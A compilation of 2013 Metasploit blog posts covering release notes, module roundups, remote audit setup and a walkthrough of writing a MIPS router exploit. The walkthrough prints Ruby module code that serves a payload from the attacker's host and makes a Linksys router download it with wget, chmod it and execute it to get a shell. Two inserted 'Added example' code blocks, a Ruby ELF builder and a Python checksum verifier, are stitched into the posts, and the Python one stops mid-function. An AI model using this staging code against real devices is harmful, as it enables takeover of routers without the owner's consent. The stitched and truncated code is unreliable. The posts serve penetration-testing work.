  • Ask the customer to log in to the machine, which launches the start-up script, creating an outbound SSH connection to your server.

 

Start your internal security audit - remotely

 

Time to get started on your internal security audit:

 

  • Point your browser to https://192.0.2.1:3790 (the tunnel server) and log in to Metasploit Pro.
  • All of your commands will be executed on the virtual machine inside your client's network.
  • When you're done, you can download the project file and reports through the browser directly onto your machine.
  • To end the engagement, ask your client to shut down the virtual machine. Note that all the data from the engagement is saved on this virtual machine, so you should either securely archive it or delete it.

 

Here's a network diagram of what you just set up:

 

[Network diagram: consultant's browser (198.51.100.0/24) -> tunnel server 192.0.2.1:3790 -> reverse SSH tunnel -> Metasploit Pro virtual machine inside the client's network]

 

Security considerations

 

Providing remote access to a local network can introduce security issues. However, the approach taken in these instructions is less dangerous than user-level VPN access:


  • The access needs to be initiated from the inside of the network, while VPN connections are initiated from the outside.
  • The virtual machine only has network access, while the VPN user also has credentials to access the network's resources
  • All network communication is encrypted (VM to server: SSH, browser to server: SSL)
  • Strong authentication is used for all connections (VM to server: SSH, browser to server: user/password)
  • Access to Metasploit Pro is limited to the network range of the consultant's network

 

Please let me know if you've had good experience with this approach, or if you have taken a slightly different approach that you would like to share.

Today, we released Metasploit Pro 4.6, which brings you some awesome new features for your enterprise security program.


Updated Web Application Security Testing with Support for OWASP Top 10 2013


Web applications are gaining more and more traction, both through internally developed applications and by adding SaaS-based solutions. These applications often contain some of the most confidential information in the organization, such as financial and customer data, credit card numbers, medical data, and intellectual property. To enable you to audit the security of these applications, Metasploit Pro's web application auditing functionality has been significantly enhanced in the new release:

 

  • Support for OWASP Top 10 2013: Release 4.6 broadens the scope of Metasploit’s security auditing with the inclusion of testing capabilities for the upcoming Open Web Application Security Project (OWASP) Top 10 2013, which is currently in the Release Candidate stage. The list identifies ten of the most critical risks relating to web applications. Due to the popularity of, and increasing reliance on, web applications, they are involved in the majority of breaches. Metasploit addresses this, enabling organizations to audit the security of their web-based applications, whether they be out of the box or custom, on-premises or in the cloud. This helps security professionals identify issues before a malicious attacker does. Learn more about what's new in our OWASP Top 10 2013 webcast.
  • Revamped user interface: Metasploit's web application security testing is now easier to use and includes a wizard that walks you through the process. This speeds up the process for seasoned web application penetration testers, and makes it really easy for new users to conduct baseline assessments.
  • More effective website spider: Like Google crawling the web to index pages, Metasploit Pro's spider follows linked pages to map out the entire application. The updated spider is now more efficient and follows harder to find links to ensure comprehensive testing.
  • Get shells using SQL injection: SQL injections are among the top causes of compromise for web applications, posing a huge risk to confidential data. Most SQL injection attacks give you access to the data in the database; Metasploit Pro's new SQL injection attacks go beyond this, giving penetration testers a session on the machine, which is equivalent to having administrative rights on the machine. This gives the penetration tester not only access to the database but also to other information on the machine, and opens the door to pivot to other machines.
  • Support for web app authentication: Many web applications require log in credentials for access. Metasploit Pro now supports the five most common authentication types.
  • Web app report with remediation advice: Finding vulnerabilities is great, but the goal is to eliminate them. The remediation advice provided in Metasploit's reports should serve as a valuable basis for discussions with internal developers and external SaaS application providers.

 

Security Auditing Wizards Accelerate Engagements, Simplify Baseline Assessments


Metasploit Pro 4.6 also introduces the concept of Security Auditing Wizards, which walk the user through the steps of a typical engagement. Seasoned penetration testers will find that the wizards shortcut the first steps of an engagement, making them more productive. For new Metasploit Pro users, the new wizards provide a great way to easily conduct baseline assessments to find low-hanging fruit. Release 4.6 introduces three new wizards:


  • Quick Penetration Testing Wizard: This wizard guides security professionals through a baseline penetration test. Only requiring users to enter an IP range, the wizard discovers assets, fingerprints hosts, determines potential attacks, runs exploits of a certain safety level, and provides a report. The wizard can either serve as a first step for a more in-depth security assessment or for a baseline penetration test to find low-hanging fruit, either as a regular security practice or before a third-party audit to make it more effective.
  • Web Application Testing Wizard: Requiring only a base URL to start, this wizard crawls the web application, finds exploitable vulnerabilities, and creates a report with remediation information. It is a great, quick way to assess the security of an application during regular assessments or as a gate before releasing it to production.
  • Phishing Simulation Wizard: Phishing emails with links or attachments that try to exploit a user's machine are a big threat vector for many organizations, both for spear phishing and for untargeted attacks. Metasploit Pro's social engineering campaigns enable organizations to measure their exposure by sending simulated phishing emails, both to get a general sense of the size of risk and to verify a reduction of risk after conducting security awareness trainings. 


TL;DR - Or "Video Killed the Blogging Star"


Can't be bothered to read all this? I'm giving a quick overview of the Metasploit Pro 4.6 release in today's Whiteboard Wednesday.




Metasploit Pro 4.6 is available for download now


All of these improvements in Metasploit Pro 4.6 are in addition to the weekly updates to all Metasploit editions, both free and commercial ones (read todb's awesome post on Metasploit Framework updates). Existing users of Metasploit can update their installation using the in-product update feature (Kali Linux users may see the update in four hours at the latest as the Kali repos sync).


If you want to learn more about what's new in OWASP Top 10 2013, reserve a free seat in our OWASP webcast today.


For a free trial of Metasploit Pro, download the Metasploit installer now.

todb

Metasploit 4.6.0 Released!

Posted by todb Employee Apr 10, 2013

We just released Metasploit 4.6.0, so applying this week's update will get you the brand new version. While Chris has a delightful blog post of what all is new in Metasploit Pro, let's take a look at what's exciting and new between Metasploit 4.5.0 and today's update to 4.6.0.

 

138 new modules

 

First off, the hacker elves have been cranking out a ton of module content since we released 4.5.0 back in December, 2012. Between then and now, we've got 138 new modules. That's 1.1 new modules per day, including those days that other people call "weekends" and "holidays." Of those, we have 80 new exploits, 44 new auxiliary modules, and 12 new post modules.

 

Of course, most of the module commits don't originate with us here at Rapid7. Over this release, we have 86 distinct committers contributing to Metasploit, and only 11 of them are employed here at Rapid7. It's this overwhelming strength of the Metasploit exploit development community that keeps me super-excited to do Good Work every day. Seriously, thank you all for that. I'm getting all verklempt here.

 

A stroll down diff lane

 

Of course, we did a little more than just sling exploit code for 4.6.0. We also moved the ball forward on a whole bunch of core development and security research. Here are the highlights:

  • We got serious about unit testing. Exploit writers are notorious for writing quick, throw-away code, born of the race to get a working PoC together before the next guy (and the next patch!). Since Metasploit Framework is largely written by exploit devs, this habit has been really hard to combat. That said, on the road to 4.6.0, we integrated Travis-CI to run our growing library of RSpec tests. We're a long way from done there, of course, but we've made some pretty significant progress.
  • We detailed our peer code review practices for landing new code and new modules. Open source security development means taking risks, leaving your comfort zone, and suffering the slings and arrows of code review. Believe me, it's a lot easier to just pile on hack after hack when you're sitting in your closed-source cubicle farm, but developing in public means that we get to review and critique code from all comers. In the end, we hope we're being helpful, and fewer mistakes are repeated for next time.
  • We ported a bunch of 0day for Metasploit users. This kind of fast turnaround immediately puts the tools to test and validate remediation directly in the hands of the people who are best positioned to help: you. In addition, Metasploit exploits are now making it into other projects' regression testing cases, and are used to teach the next wave of security researchers how to quickly turn a found-in-the-wild 0day into a useful, safe, and effective exploit module.
  • We implemented a pretty novel new Postgres payload delivery system -- just in time for the recent wave of Postgres vulnerabilities! Nothing proves a vulnerability better than popping shells.
  • We invented a portable Ruby command exec payload to take advantage of the wave of Rails vulnerabilities announced these last couple months. While getting a rails server to print "hello world!" on the console is all well and good, it's really all about the shells.
  • We updated msfupdate to fully take advantage of our Git-based source code control systems, as well as to use the Metasploit Community and Pro edition update systems. We recognize that most Metasploit users really just want stability and security in their updates, and tracking along a source code tree isn't usually the way to get there. So, now installed versions of Metasploit (including Kali-installed Debian packages) will only update once a week, after the usual in-house QA and validation.
  • We turned exploited endpoints into Hollywood-hacker spy systems. Thanks to a user bug, we found that the record_mic feature of Meterpreter had been broken for a little while. So, we fixed it, wrapped it up in a post module, added a webcam activation module and some CCTV controller, and unleashed these A/V-centric modules into the world. I have no idea if real espionage agents actually do this kind of thing or not, but now you can prove that they can on your next pentest engagement. After all, that's kind of the point of a penetration test -- you want to be able to simulate what a real adversary could do in order to bring attention to the real risk of vulnerabilities.
  • We put together some UPnP modules to help people scan their enterprises for misconfigured and buggy UPnP endpoints. You are blocking and watching UDP port 1900 by now, right?
  • We asked you nicely to msftidy.rb your modules as part of a Git pre-commit hook. Since we started automating msftidy, the module quality we've been seeing shot up considerably, and we've been able to move new modules through the pull request queue a lot faster with a lot fewer common mistakes. Of course, as a result, we now get more pull requests. I'm sure there's an economics lesson about friction in there somewhere.
  • We started using a new heap spray technique for our many browser-based exploits. This was on the heels of some very excellent training and collaboration with the Corelan Team. Now, with a little luck, we can write more reliable exploits all the way through Internet Explorer 10, as well as Firefox 54 (or whatever their latest version is by the time this post goes live).
  • We now support Kali as an installation target. This was a huge accomplishment, thanks to the teamwork between Rapid7 and Offensive Security, getting a stable, supportable build into the hands of Kali Linux users worldwide. Assuming this ends up working out as we expect, we should be able to start supporting other platforms, such as Ubuntu, Debian, and Mint, with proper Debian packages. (We're also experimenting with a for-real Homebrew tap for you Mac OSX guys, but shhh it's not official yet.)
  • We pushed the envelope on WAP/Router hacking by landing a metric ton of exploit and auxiliary modules targeting Linksys, D-Link, and Netgear devices, as well as putting together command execution payloads custom built for MIPS computing environments.

 

So, yeah. Been a busy four months or so. All of those bullets start with the word "we," and like I said, that's not just Rapid7 folks; it's all of you who pitched in with your work, patience, smarts, and gumption to get this thing out the door. Thanks!

 

Module roundup

 

If you're upgrading from 4.5.0 to 4.6.0, here's the laundry list of security testing goodness you have to look forward to. Let's be careful out there!

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Normally we don't get a lot of contributions regarding embedded devices, even though they are an interesting target from the pentesting point of view and it is common to find them outside the DMZ on corporate networks. Maybe it's because access to these devices, or to the software running on top of them, is not so easy. Maybe it's because they are usually based on MIPS architectures, which haven't received as much attention as x86 or ARM. Or maybe it's because it isn't always easy to run their software in a controlled (debugged) fashion.



Fortunately, Michael Messner (aka m-1-k-3) is the exception: he isn't only doing awesome vulnerability research on small Linux routers, but also great work writing modules that target these embedded devices in order to fingerprint them, retrieve configuration files or get shells. In this blog post we would like to share with all of you a successful (spoiler!) trip to a shell which we took together with m-1-k-3. The post also introduces some of the new improvements in Metasploit that speed up exploit development on MIPS-based devices.

 

 

This story started with m-1-k-3 submitting some pull requests for auxiliary modules that achieve remote OS command execution on MIPS network-related embedded devices through their web interfaces:

 

  • #1618: Remote command execution on Netgear DGN2200B
  • #1636: Remote command execution on Netgear DGN1000B
  • #1640: Remote command execution on D-Link DIR-615

 

After reviewing them and discussing the topic with other Metasploit developers, we asked m-1-k-3 to convert these auxiliary modules into remote exploits. Normally, once you have a way to execute arbitrary OS commands, it's more or less easy to get a Metasploit session and a working exploit. Exploits are preferred because Metasploit users benefit in two ways:

 

  1. They get easy and powerful interaction with the target through a session.
  2. They benefit from post-exploitation modules.

 

Unfortunately, on embedded devices it's usual to have only a small set of OS commands available, through a restricted busybox shell plus a few extra tools. Here is, for example, the set of commands available on a DGN 1000B device:

 

[            br2684ctld    dmesg            igmp           ln          nbtscan      pppd                routed           udhcpd
[[           brctl         dnrd             import_ca.cgi  ls          netgear_ntp  pppoe               scfgmgr          umount
adslmod      busybox       dsl_cpe_control  init           lsmod       nvram        pppoe-relay         setup.cgi        upgrade_flash.cgi
aes-up.sh    cat           dsl_diag         insmod         md5sum      oamd         ps                  setupwizard.cgi  upload.cgi
ash          chmod         echo             iptables       mini_httpd  oamlbsearch  rc                  sh               wget
athcfg       cmd_agent_ap  ez-ipupdate      iptpat_util    miniupnpd   pb_ap        reboot              sleep            wifi_monitor
atmarp       conf          free             kill           mkdir       ping         restore_config.cgi  smtpc            wizard
atmarpd      cp            halt             killall        mknod       pot          rm                  syslogd          wpa_supplicant
atm_monitor  crond         hostapd          klogd          mount       potcounter   rmmod               test             wpatalk
br2684ctl    cut           ifconfig         lld2           mv          poweroff     route               udhcpc           wsc_det

 

After discussing the possibilities with @m-1-k-3, we concluded it wasn't a good idea to write CMD exploits for these devices, for two reasons:

 

  1. In the best case we would need new payloads which would be device specific.
  2. Native payloads (and shell sessions) are more powerful than CMD payloads.

 

After discarding CMD-type exploits, we switched to the possibility of staging from CMD to the execution of a native payload. Since tools such as wget, or alternative ways to download files from remote hosts to the embedded device, are usually available, it sounded like a good option; in fact, it sounded like a perfect solution for us. But there was another pitfall: Metasploit still had no support for creating MIPS ELF executables (neither big endian nor little endian), so MIPS payloads couldn't be embedded into executable files programmatically. Fortunately, adding the support was as easy as:

 

1) Create tiny ELF templates for the MIPS architectures (little and big endian). In the case of MIPSLE something like:

 

BITS 32

org 0x00400000

ehdr:                              ; Elf32_Ehdr
  db    0x7F, "ELF", 1, 1, 1, 0    ;  e_ident     = magic, ELFCLASS32, ELFDATA2LSB, EV_CURRENT, SYSV ABI
  db    0, 0, 0, 0,  0, 0, 0, 0    ;  (padding)
  dw    2                          ;  e_type      = ET_EXEC for an executable
  dw    0x8                        ;  e_machine   = MIPS
  dd    1                          ;  e_version
  dd    _start                     ;  e_entry
  dd    phdr - $$                  ;  e_phoff
  dd    0                          ;  e_shoff
  dd    0                          ;  e_flags
  dw    ehdrsize                   ;  e_ehsize
  dw    phdrsize                   ;  e_phentsize
  dw    1                          ;  e_phnum
  dw    0                          ;  e_shentsize
  dw    0                          ;  e_shnum
  dw    0                          ;  e_shstrndx

ehdrsize equ  $ - ehdr

phdr:                              ; Elf32_Phdr
  dd    1                          ;  p_type      = PT_LOAD
  dd    0                          ;  p_offset
  dd    $$                         ;  p_vaddr
  dd    $$                         ;  p_paddr
  dd    0xDEADBEEF                 ;  p_filesz    (placeholder, patched with the final file size once the payload is appended)
  dd    0xDEADBEEF                 ;  p_memsz     (placeholder, patched the same way)
  dd    7                          ;  p_flags     = rwx
  dd    0x1000                     ;  p_align

phdrsize equ  $ - phdr

_start:                            ; the payload bytes are appended here

 

2) Add support to Msf::Util::EXE so that it takes the new templates into account. MIPS ELF executables can then be created through the mixin by calling the Msf::Util::EXE.to_executable() API, or through the Msf::Exploit::EXE mixin by calling its generate_payload_exe() method. If you would like to review exactly how the support was added, check the following pull requests:

 

  • #1666: Support for MIPSLE ELF.
  • #1671: Support for MIPSBE ELF.
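To make the template concrete, here is an added example (not Metasploit's own Msf::Util::EXE code) that lays out the same ELF header and single PT_LOAD program header in pure Ruby for both endiannesses, appends a payload at _start, fills in the two 0xDEADBEEF placeholders, and parses the result back to check it. The function names and the all-zero sample payload are this example's own.

```ruby
# Added example, not Metasploit's own code: build and parse a minimal static
# MIPS ELF the same way the NASM template above lays it out. The ELF header and
# one PT_LOAD program header are emitted with Array#pack, the payload is
# appended at _start (file offset 0x54), and the two 0xDEADBEEF placeholders
# (p_filesz / p_memsz) receive the real file size. Names such as build_mips_elf
# and parse_elf_header are this example's own, not Msf::Util::EXE's.

ELF_MAGIC  = "\x7FELF".b
EH_SIZE    = 52          # sizeof(Elf32_Ehdr)
PH_SIZE    = 32          # sizeof(Elf32_Phdr)
BASE_VADDR = 0x00400000  # "org 0x00400000" in the template
ET_EXEC    = 2
EM_MIPS    = 8
PT_LOAD    = 1
PF_RWX     = 7

# Constructed stand-in for a payload: four MIPS nops (all-zero words).
SAMPLE_PAYLOAD = ("\x00" * 16).b

# Wrap +payload+ in an ELF32 executable for MIPS; +endian+ is :little or :big.
def build_mips_elf(payload, endian)
  le  = (endian == :little)
  u16 = le ? 'v' : 'n'                            # pack directive for 16-bit fields
  u32 = le ? 'V' : 'N'                            # pack directive for 32-bit fields
  entry  = BASE_VADDR + EH_SIZE + PH_SIZE         # _start directly follows the phdr
  filesz = EH_SIZE + PH_SIZE + payload.bytesize   # the whole file is one segment

  # e_ident: magic, EI_CLASS=1 (32-bit), EI_DATA (1=LSB, 2=MSB), EI_VERSION=1,
  # EI_OSABI=0, then 8 bytes of padding, exactly like the two "db" lines.
  e_ident = ELF_MAGIC + [1, le ? 1 : 2, 1, 0].pack('C4') + ("\x00" * 8).b
  ehdr = e_ident +
         [ET_EXEC, EM_MIPS].pack("#{u16}2") +             # e_type, e_machine
         [1, entry, EH_SIZE, 0, 0].pack("#{u32}5") +      # e_version, e_entry, e_phoff, e_shoff, e_flags
         [EH_SIZE, PH_SIZE, 1, 0, 0, 0].pack("#{u16}6")   # e_ehsize .. e_shstrndx
  # Elf32_Phdr: one rwx PT_LOAD segment mapping the whole file at BASE_VADDR.
  phdr = [PT_LOAD, 0, BASE_VADDR, BASE_VADDR, filesz, filesz, PF_RWX, 0x1000].pack("#{u32}8")
  ehdr + phdr + payload.b
end

# Read back the fields a loader cares about and recover the embedded payload.
# Raises ArgumentError on anything that is not a single-segment ELF32 image
# with its size placeholders already filled in.
def parse_elf_header(data)
  raise ArgumentError, 'not an ELF file' unless data.byteslice(0, 4) == ELF_MAGIC
  raise ArgumentError, 'not ELF32' unless data.getbyte(4) == 1
  le = case data.getbyte(5)
       when 1 then true
       when 2 then false
       else raise ArgumentError, 'bad EI_DATA'
       end
  u16 = le ? 'v' : 'n'
  u32 = le ? 'V' : 'N'
  e_type, e_machine = data.byteslice(16, 4).unpack("#{u16}2")
  _e_version, e_entry, e_phoff = data.byteslice(20, 12).unpack("#{u32}3")
  e_phnum = data.byteslice(44, 2).unpack1(u16)
  raise ArgumentError, 'expected exactly one program header' unless e_phnum == 1
  p_type, p_offset, p_vaddr, _p_paddr, p_filesz, p_memsz, p_flags =
    data.byteslice(e_phoff, PH_SIZE).unpack("#{u32}7")
  raise ArgumentError, 'p_filesz still holds the placeholder' if p_filesz == 0xDEADBEEF
  raise ArgumentError, 'p_filesz larger than the file' if p_offset + p_filesz > data.bytesize
  entry_off = e_entry - p_vaddr + p_offset   # file offset of _start
  {
    endian: le ? :little : :big, type: e_type, machine: e_machine, entry: e_entry,
    p_type: p_type, p_vaddr: p_vaddr, p_filesz: p_filesz, p_memsz: p_memsz, p_flags: p_flags,
    payload: data.byteslice(entry_off, p_filesz - (entry_off - p_offset))
  }
end

if __FILE__ == $0
  %i[little big].each do |endian|
    elf = build_mips_elf(SAMPLE_PAYLOAD, endian)
    puts "#{endian}-endian: #{elf.bytesize} bytes -> #{parse_elf_header(elf).inspect}"
  end
end
```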

 

With support for MIPS ELF executables available in Msf::Util::EXE, it's just a matter of coding to have these awesome embedded device exploits available. And m-1-k-3 started writing the first of (we hope!) a long series of embedded device exploits. This first module abuses an authenticated OS command injection in the web interface of the Linksys E1500/E2500 wireless routers. The vulnerability details can be found in the original advisory, and the full exploit-writing history can be found in the pull request "#1688: Linksys E1500/E2500 Remote Command Execution". In summary, in order to execute the shell payloads, the staging is accomplished by:

 

1) Create a MIPS ELF with the payload to execute, after including the Msf::Exploit::EXE mixin:

 

# generate_payload_exe picks the MIPS ELF template matching the selected target
@pl = generate_payload_exe

 

2) Start a Web Server (or use an external one).

 

#
# start our server
#
resource_uri = '/' + downfile

if (datastore['DOWNHOST'])
  service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
  # do not use SSL
  if datastore['SSL']
    ssl_restore = true
    datastore['SSL'] = false
  end

  # we use SRVHOST as download IP for the coming wget command.
  # SRVHOST needs a real IP address of our download host
  if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
    srv_host = Rex::Socket.source_address(rhost)
  else
    srv_host = datastore['SRVHOST']
  end

  service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
  print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
  start_service({'Uri' => {
    'Proc' => Proc.new { |cli, req|
      on_request_uri(cli, req)
    },
    'Path' => resource_uri
  }})

  datastore['SSL'] = true if ssl_restore
end

 

3) Use the web server to send the ELF with the embedded payload in response to new requests:

 

# Handle incoming requests from the server
def on_request_uri(cli, request)
  #print_status("on_request_uri called: #{request.inspect}")
  if (not @pl)
    print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
    return
  end
  print_status("#{rhost}:#{rport} - Sending the payload to the server...")
  @elf_sent = true
  send_response(cli, @pl)
end

 

4) Exploit the remote OS command injection to download the MIPS ELF payload with the available wget tool:


#
# download payload
#
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
# this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)

# not working if we send all commands together -> let's take three requests
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end

5) Exploit the remote OS command injection to give execution permissions to the downloaded binary:


#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end

6) Exploit the remote OS command injection to execute the downloaded binary:


#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end

7) Enjoy! After a long and fun trip we can now enjoy Linksys E1500 shells (thanks m-1-k-3!):


Linksys E1500 reverse shell session (shared by m-1-k-3)

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Minecraft-Vectored Malware

Metasploit exploit developer Juan @_juan_vazquez_, while trawling the Internet for the next hot exploit, came across this pastie describing a Java exploit which takes advantage of a vulnerability in Java's Color Management classes. Turns out, this is also one of the vulns being exploited in McRat, a Trojan targeting Windows-based Minecraft players (that's what the "Mc" stands for).

 

McRat is compelling to potential victims because of its specificity and large potential victim pool. By targeting Minecraft players, attackers are specifically avoiding the browser vector, for starters. They're also playing on people's tendency to install non-work related software on work machines, so your victims, by default, are not going to get a lot of love from their IT departments. On top of this, they're more likely to ignore the blanket advice to "disable Java," because they may not be aware that disabling Java in the browser won't, in fact, impact their stand-alone Minecraft experience.

 

There's since been a patch for this vulnerability -- it looks like Oracle is moving ever faster to knock out patches for these things. They also appear to have abandoned their quarterly patch cycle for all practical purposes when it comes to actively exploited security issues. If you haven't updated yet to Java 7u17 (or 6u43), now's a good time. If you believe you've patched, you can use the new module, Java CMM Remote Code Execution, to make sure.

 

PHP Shell Games

Speaking of malicious attacker software, this week also sees a quartet of new modules from community contributor bwall. We are now shipping modules targeting Ra1NX, STUNSHELL (two for that one), and v0pCr3w's shell.

 

These kinds of hack-the-hacker modules can be particularly useful on a penetration testing engagement. Not only are you able to identify machines that were compromised before you got there, but you can turn around and use the existing compromises to extend your own control over the affected assets. As egypt likes to say in his Metasploit training classes, "there is no cheating in hacking." Of course, you will want to alert your client pretty much right away and advise them on their current compromised situation.

 

MongoDB

I have it on good authority that internationally renowned superhacker and MongoDB user HD Moore was (quote) "just looking at that code," and was bummed that he didn't spot the vulnerability before agix. So it goes with bug-hunting, you can't win 'em all, and there are plenty of smart, dedicated exploit developers in the world who have just as good a shot at uncovering exploits that other smart, dedicated exploit devs might miss the first time around. In this case, it was community contributor agix who discovered the vulnerability in MongoDB and proved it out with a Metasploit module. 10gen, the primary maintainers of MongoDB, turned out a patch nearly immediately, so if you're a MongoDB user, you'll want to pick that up pronto.

 

New Modules

Wow, this post ended up being all about exploit content. Here are the rest of the modules -- 10 new ones, including those detailed above. In fact, the only non-exploit we have this week is a post-exploitation module for sneaking UNC paths into Word documents, courtesy of community contributor Sphaz. Thanks everyone!

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Unix, Evolved

 

Today, we are delighted to announce the next phase of Metasploit's expanded support for more diverse host operating systems. On the heels of our integration work with Kali Linux, we've been heads-down on putting the finishing touches on our support for the future of Unix, Plan 9 from Bell Labs.

 


 

This renewed commitment to Plan 9 will come as a welcome relief for those of you who have, until now, been stuck on hobby operating systems such as Linux and FreeBSD -- academics and other researchers agree that Plan 9's rethinking of the file system mount points and distributed hardware models is ideal for today's networking environment. As we continue to blur the distinctions between the "extranet" and the "cloud," an operating system designed for distributed software and hardware is the most sensible choice for penetration testers, exploit developers, and IT operations.

 

If you've been living under a rock for the last several years and have somehow avoided using Plan 9 so far, feel free to check the reference VMWare appliance. I'm sure you'll find the interface both intuitive and powerful. How could you not love an operating system that lets you mount a remote Ethernet interface as a local file system entity? Who needs clicking on hyperlinks when you can just mount the web site and use ls, grep, and find to navigate? Plan 9's utility as a pen-testing platform is apparent to anyone who's been brave enough to make the switch.

 

For those of you who have already made the switch, please feel free to comment below on your experiences with using Metasploit on this most excellent platform for security professionals. Readers are also encouraged to post here screenshots of Metasploit running on their own preferred operating system, be it a P9 derivative like 9Front or Inferno, or some other comparable OS such as NeXTSTEP, BeOS, SCO Open Desktop, or really any other device you're likely to use on an engagement.

Consumer-Grade Hacking

Last month, I talked about community contributor Michael @m-1-k-3 Messner's nifty D-Link authentication bypass, and made the case that having Metasploit modules for consumer-grade access points is, in fact, useful and important.

 

Well, this week's update has a pile of new modules from m-1-k-3, all of which are targeting these kinds of consumer-grade networked devices: We now have a Linksys E1500 / E2500 remote command exec exploit, a Linksys 1500 directory traversal exploit, a directory traversal module for TP-Link's TL-WA701ND access point, a password extractor for the DLink DIR-645, and a directory traversal module for NetGear's weird single-purpose cordless phone device.

 

That's right, we have a Metasploit module for a cordless phone. The era of there being a difference between your "electronic devices" and your "computer devices" is coming to a close. What I said last month about these sorts of devices being in scope for a pen-test still stands -- if they're not in scope today, they really ought to be, at least for key personnel. Criminals don't particularly care about your scope doc.

 

Thanks loads, m-1-k-3, for your work on these!

 

Who shot who in the what now?

This week's update includes a .mailmap file which consolidates the identities of contributors. For example, you can now see easily that the majority of contributors are, of course, not Rapid7 employees. This speaks to the power of the open source model of security software development that we employ here; even if Rapid7 tomorrow decided to pull the plug on this whole Metasploit thing and prohibited us from working on it, Metasploit will live on.

 

Technically, .mailmap helps consolidate "identities" to "humans," so things like 'git shortlog' and 'git blame' / 'git praise' are more meaningful. I use this data all the time to be able to determine who's committing what, and I'm sure third-party sites like Ohloh are doing the same.

 

The information used to populate the .mailmap was collected from git commit messages, so if you have personal info in there that you don't want, then a) be more careful with your own git config files, and b) let me know and I'll excise or anonymize or whatever.

 

Rake DB tests

I've talked about our slouching into the modern era of Ruby development before, and Rapid7 Metasploit Pro developer Luke @KronicDeth Imhoff has been valiantly championing that cause. The latest major change has been bringing the ability to "rake db" directly in Metasploit Framework, as of Pull Request #1592. This allows for all the usual database migrations, rollbacks, and drops that Rails developers are accustomed to having available. It also allows for direct testing of a lot of database-backed functionality, so this also strikes another blow for TDD.

 

Incidentally, if you are the sort to open a pull request on Metasploit, check out Luke's Verification Steps. This kind of initial documentation is massively useful for reviewers, as it really helps to demonstrate why your change is needed, what you think intended functionality is, and gives hints on how to test that your change is actually successful.

 

Msfupdate: Adios SVN

This is your final warning. If you're on an SVN checkout for Metasploit, you want to upgrade now. 'msfupdate' will no longer update over SVN; it will tell you to get your act together and exit with code 0x11. This has been warned about since November of 2012. The SVN server is still up, so you can use regular svn commands to get a checkout going (or edit your own version of msfupdate), but really, honest and true, you need to either (a) get a binary install for Metasploit, which comes with both Framework and Metasploit Community / Pro, or (b) get a local git clone of the source and track along with that. Both mechanisms are described at http://r-7.co/MSF-UP.

 

New Modules

We've got fourteen new modules this week -- half exploits, half aux/post. Enjoy!

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Version bump to Metasploit 4.5.3

This week, we've incremented the Metasploit version number by one trivial point to 4.5.3 -- this was mainly done to ensure that new users get the fixes for the four most recent vulnerabilities that were fixed by Rails 3.2.13. While we're not aware of any exploits out there targeting Metasploit in particular (and these vulns do require an attacker to target specific applications), you'd be advised to update at your earliest convenience.

 

In addition, 4.5.3 is once again a code-signed executable for Windows -- Linux users can still verify their bins by checking the appropriate SHA1 and PGP signature. Since we go to all the trouble of producing these signatures, you should probably check them. Not getting backdoored is a Good Thing.
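As an added illustration of that verification step (example code, not Rapid7's tooling), the following Python checks a downloaded file against a sha1sum-style manifest. The file names, file contents and manifest lines are constructed; the "published" digest is stood in for by one computed from the sample bytes. An unlisted file and a mismatched digest are both treated as failures, and the comparison is constant-time.

```python
"""Verify a downloaded binary against a sha1sum-style manifest.

Added example, not Rapid7's tooling. Everything below (file names, contents,
manifest) is constructed for the demonstration.
"""
import hashlib
import hmac
import os
import tempfile


def sha1_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA1 so large installers do not go into memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse sha1sum output: 'digest  name' (text mode) or 'digest *name' (binary)."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"malformed manifest line: {raw!r}")
        digest, name = parts[0].lower(), parts[1]
        if name.startswith("*"):
            name = name[1:]
        if len(digest) != 40 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"malformed digest on line: {raw!r}")
        expected[name] = digest
    return expected


def verify(path, manifest_text):
    """Return (ok, reason). Only an exact digest match is a pass."""
    name = os.path.basename(path)
    expected = parse_manifest(manifest_text).get(name)
    if expected is None:
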